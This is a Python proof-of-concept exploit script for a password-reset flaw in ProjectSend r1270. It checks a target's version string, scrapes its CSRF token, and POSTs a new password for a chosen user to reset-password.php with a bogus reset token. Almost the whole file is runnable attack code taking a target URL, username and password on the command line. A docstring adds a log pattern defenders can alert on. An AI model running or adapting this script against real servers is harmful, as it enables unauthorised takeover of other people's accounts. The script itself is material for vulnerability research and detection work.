"""Proof-of-concept client for the ProjectSend r1270 password-reset issue.

What the script does, as visible in the code below:

* ``check``       - fetches the base URL and looks for the string
                    ``version r1270`` in the response body.
* ``getCSRFtoken``- fetches the base URL again and extracts the hidden
                    ``csrf_token`` form field with a regex.
* ``exploit``     - POSTs to ``<url>/reset-password.php?user=<user>&token=NotValid``
                    with ``form_type=new_password`` and a new password, then
                    checks the response for the "password has been set" text.

Defender-relevant observations (all derived from the requests this code
issues): a password-reset POST carrying a literal ``token=NotValid`` query
parameter, preceded by two GETs of the application root from the same
session, is the request pattern this script produces and is a reasonable
thing to alert on in web-server logs. Every request is sent with
``verify=False``, so TLS certificate validation is disabled client-side.

Globals ``url``, ``user``, ``pwd`` and ``proxies`` are populated by ``main``
from the command line before any helper runs.
"""

import requests
import argparse
import re

# Default: no proxy for either scheme. Overwritten in main() when --proxy
# is supplied.
proxies = {"http": None, "https": None}

# Response-body markers the script searches for. Both lookups use
# str.find(...) > 0, so a marker sitting at offset 0 would be treated as
# absent; that quirk is preserved here.
_VERSION_MARKER = 'version r1270'
_RESET_OK_MARKER = "Your new password has been set. You can now log in using it."


def check():
    """Create a session, GET the base URL and report on the version marker.

    Returns:
        The ``requests.Session`` used for the GET, so that any cookies the
        server set are reused by later calls.
    """
    sess = requests.Session()
    resp = sess.get(url, proxies=proxies, verify=False)
    found = resp.text.find(_VERSION_MARKER) > 0
    print("The application is vulnerable" if found
          else "The application may not be vulnerable")
    return sess


def getCSRFtoken(session):
    """Return the value of the hidden ``csrf_token`` field on the base URL page.

    Args:
        session: the ``requests.Session`` returned by ``check``.

    Returns:
        The first regex capture group (the token string).

    Raises:
        AttributeError: if the field is not present in the response body,
            because ``re.search`` returns ``None`` and ``.group`` is then
            called on it.
    """
    resp = session.get(url, proxies=proxies, verify=False)
    match = re.search(" +name=\"csrf_token\" value=\"(.*?)\"", resp.text)
    return match.group(1)


def exploit(session):
    """POST a new password to reset-password.php and print the outcome.

    The request goes to ``<url>/reset-password.php?user=<user>&token=NotValid``
    with the CSRF token from ``getCSRFtoken`` and ``form_type=new_password``.
    Success is judged solely by the presence of the confirmation text in the
    response body.

    Args:
        session: the ``requests.Session`` returned by ``check``.
    """
    token = getCSRFtoken(session)
    endpoint = url + "/reset-password.php?user={}&token=NotValid".format(user)
    form = {
        "csrf_token": token,
        "form_type": "new_password",
        "password": pwd,
    }
    resp = session.post(endpoint, data=form, proxies=proxies, verify=False)
    succeeded = resp.text.find(_RESET_OK_MARKER) > 0
    print("Sucess!!" if succeeded else "Fail!!!")


def main():
    """Parse arguments, validate the URL shape, then run check() and exploit().

    Side effects: assigns the module globals ``url``, ``user``, ``pwd`` and
    (when ``--proxy`` is given) ``proxies``; calls ``exit()`` when the URL
    does not match the validation regex.
    """
    global url, user, pwd, proxies

    parser = argparse.ArgumentParser(
        description='CVE-2020-2875: ProjectSend r1270 Privilage Escalation')
    parser.add_argument('--url', type=str, required=True,
                        help='The url address of the ProjectSend app')
    parser.add_argument('--user', type=str, required=True,
                        help='The user name target of the app')
    parser.add_argument('--pwd', type=str, required=True,
                        help='The new password to set')
    parser.add_argument('--proxy', type=str, required=False,
                        help="The proxy to be use in format IP:PORT By default None")
    args = parser.parse_args()

    url, user, pwd = args.url, args.user, args.pwd

    # Note: the https entry is built with an https:// scheme, exactly as the
    # original did; whether the proxy accepts that is up to the proxy.
    if args.proxy is not None:
        proxies = {
            "http": f"http://{args.proxy}",
            "https": f"https://{args.proxy}",
        }

    # Loose syntactic check that --url looks like an http(s) URL with a
    # hostname, "localhost" or a dotted quad, an optional port and an
    # optional path. It is a shape check only, not a reachability check.
    url_shape = re.compile(
        r'^(?:http)s?://'                                               # scheme
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain
        r'localhost|'                                                   # localhost
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'                          # or IPv4
        r'(?::\d+)?'                                                    # optional port
        r'(?:/?|[/?]\S+)$',                                             # optional path/query
        re.IGNORECASE,
    )
    if url_shape.match(url) is None:
        print("The provided url is not valid!")
        exit()

    exploit(check())


if __name__ == "__main__":
    main()